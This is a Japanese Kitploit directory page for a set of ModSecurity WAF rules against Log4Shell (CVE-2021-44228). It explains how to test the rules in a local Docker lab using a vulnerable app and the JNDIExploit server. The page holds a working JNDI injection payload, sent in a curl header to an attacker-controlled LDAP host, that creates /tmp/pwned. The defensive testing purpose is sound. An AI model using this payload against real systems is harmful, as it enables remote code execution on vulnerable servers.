Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ModSec-log4j2 — log4j2保護のためのModSecルール - CVE-2021-44228 | Kitploit
ツール/GitHubGitHub/felipe8398/modsec-log4j2
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテスト学習と教育
GitHubfelipe8398/modsec-log4j2

ModSec-log4j2

log4j2保護のためのModSecルール - CVE-2021-44228

リポジトリを見る
44年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ModSecルールのテスト

前提条件

  • Dockerがインストールされていること
  • Javaがマシンにインストールされていること

テストの実行

  • リポジトリのgit cloneを実行
  • 以下のコマンドを実行してWAF(ModSec)と脆弱なアプリケーションを起動
root@kitploit:~
docker stack deploy -c docker-compose.yml WAF
  • リポジトリにあるJNDIExploit.v1.2.zipを展開し、そのフォルダに入り、以下のコマンドを実行します。$IPはあなたのマシンのIPアドレスに置き換えてください。127.0.0.1は使用しないことをお勧めします。
root@kitploit:~
java -jar ./JNDIExploit-1.2-SNAPSHOT.jar -i $IP -p 8888
  • RCEをテストするには、以下のcurlを実行し、$IPをあなたのマシンのIPに置き換えてください。これにより、脆弱なアプリケーションの/tmp内にpwnedファイルが作成されます。
root@kitploit:~
curl 127.0.0.1:80 -H 'X-Api-Version: ${jndi:ldap://$IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

大学生からの質問

1- 自分のWAFと脆弱なWebアプリケーションが起動したことを確認するには?

docker service ls を実行し、それぞれが1つのレプリカを持つ2つのサービスがあるか確認してください。

2- ModSecのログを取得するには?

以下のコマンドを実行してください docker exec -ti $(docker container ls | grep "felipe8398/redirector:latest"| awk '{print $1}') cat /var/log/apache2/error.log

3- RCEが成功しなかったことを確認するには?

使用したcurlはtmp内にpwnedという名前のファイルを作成します。そのため、以下のコマンドを実行する必要があります docker exec -ti $(docker container ls | grep ghcr.io/christophetd/log4shell-vulnerable-app:latest | awk '{print $1}') ls /tmp

ツールをダウンロード